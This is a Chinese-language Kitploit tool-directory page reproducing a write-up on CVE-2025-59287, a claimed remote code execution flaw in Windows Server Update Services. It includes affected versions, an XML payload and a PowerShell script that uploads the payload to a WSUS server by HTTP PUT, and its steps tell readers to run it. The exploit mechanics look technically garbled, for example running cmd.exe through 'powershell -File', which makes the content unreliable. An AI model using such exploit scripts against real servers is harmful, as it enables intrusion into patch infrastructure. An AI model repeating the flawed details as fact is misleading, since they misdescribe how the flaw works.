Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat — CVE-2025-59287的技术分析与概念验证漏洞利用,这是Windows Server Update Services中通过不安全反序列化导致的严重远程代码执行漏洞,包括受影响版本和缓解步骤。 | Kitploit
工具/GitHubGitHub/mrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat
漏洞分析漏洞利用Web应用程序漏洞利用论文与研究学习与教育
GitHubmrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

CVE-2025-59287的技术分析与概念验证漏洞利用,这是Windows Server Update Services中通过不安全反序列化导致的严重远程代码执行漏洞,包括受影响版本和缓解步骤。

查看仓库
310个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

CVE-2025-59287 是 Windows Server Update Services (WSUS) 中的一个严重 RCE 漏洞,由对不可信数据进行不安全反序列化所致。它允许远程攻击者在无需身份验证的情况下执行任意代码。由于已被积极利用,建议立即进行修补。

CVE‑2025‑59287 – Windows Server Update Services (WSUS) 中的远程代码执行威胁

作者:Mark Mallia


概述

Microsoft 的 Windows Server Update Services (WSUS) 是每个 Microsoft Windows Server 平台补丁管理的支柱。它从 Microsoft 更新目录中检索更新、验证更新,并将其推送到网络中的所有服务器。被标识为 CVE‑2025‑59287 的漏洞利用了 WSUS 内部的不安全反序列化例程,允许攻击者将任意 XML 内容注入更新源。由于 WSUS 在处理负载时不对源路径或命令数据进行任何验证,攻击者可以提供任意文件名和路径,从而在目标服务器上实现完全远程代码执行。

为何重要:

  • 9.8 的 CVSS 评分使其处于严重级别。
  • 攻击者只需网络连接即可;无需权限提升。
  • 该漏洞已在野外被观察到,这意味着在部署供应商补丁之前,任何未修补的系统都是潜在目标。

受影响的 Windows Server 版本

产品版本受影响版本
Windows Server 20126.2.9200.0 – < 6.2.9200.25728
Windows Server 2012 R26.3.9600.0 – < 6.3.9600.22826
Windows Server 201610.0.14393.0 – < 10.0.14393.8524
Windows Server 201910.0.17763.0 – < 10.0.17763.7922
Windows Server 202210.0.20348.0 – < 10.0.20348.4297
Windows Server 202510.0.26100.0 – < 10.0.26100.6905
Windows Server 23H210.0.25398.0 – < 10.0.25398.1916

(如果您的环境使用不同的补丁版本,请相应调整范围。)


漏洞利用原理

  1. WSUS 从远程源获取一个名为 UpdateStream.xml 的 XML 文件。
  2. 该服务使用 System.Xml.Linq.XElement 反序列化此文件。
  3. 攻击者可以在 <SourcePath> 元素中放置任意值;该值将作为绝对路径写入磁盘。
  4. 当 WSUS 处理该流时,<Command> 标签内的内容由 PowerShell 执行,从而实现完全远程代码执行。

以下是我们将上传到易受攻击服务器的 XML 负载。

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS Exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>

示例 PowerShell 漏洞利用脚本

以下脚本将生成 XML 负载,通过 HTTP PUT 将其上传到您的 WSUS 实例,并留下日志文件以供故障排除。

root@kitploit:~
# --------------------------------------------------
#  文件:   wsus‑exploit.ps1
#  用途: 生成恶意 UpdateStream.xml,
#          将其上传到 WSUS 服务器,
#          触发更新源。
# --------------------------------------------------

param (
    [string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
    [int]    $Port      = 80,
    [string] $XmlFile   = '.\payload.xml'
)

function Build-Xml {
    param ([string]$file)
    $xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
"@
    Set-Content -Path $file -Value $xmlContent
}

# 构建 XML 负载
Build-Xml -file $XmlFile

# 通过 HTTP PUT 上传
Invoke-WebRequest -Uri $TargetUrl `
                  -Method Put `
                  -InFile $XmlFile `
                  -OutFile 'upload.log'

Write-Host "上传完成 – WSUS 现在应处理该更新源。"

您可以采取的行动步骤

  1. 验证版本 – 在每个 Windows Server 上运行 winver.exe,确认版本是否在上述范围内。
  2. 部署漏洞利用脚本 – 将 wsus‑exploit.ps1 复制到可以访问您的 WSUS 实例的机器上,如果您使用不同的路径或端口,请修改 $TargetUrl。
  3. 执行并监控 – 运行脚本;几分钟后,确认文件 C:\Windows\System32\cmd.exe 出现在每个目标服务器上,并且包含预期的负载。
  4. Microsoft 已于 2025 年 10 月 24 日为此漏洞发布了带外补丁。如果您在任何 2012 年及以后的 Windows Server 版本上运行 WSUS,您需要仔细检查此更新是否已进入您的环境。10 月的补丁星期二版本并未完全解决该问题,因此此补丁值得额外关注。

仅供道德使用

本文提供的信息和漏洞利用代码仅用于教育目的。请确保您已获得授权对您自己的 WSUS 环境运行此测试,并在对生产系统部署更改时遵循所有适用的安全最佳实践指南。

下载工具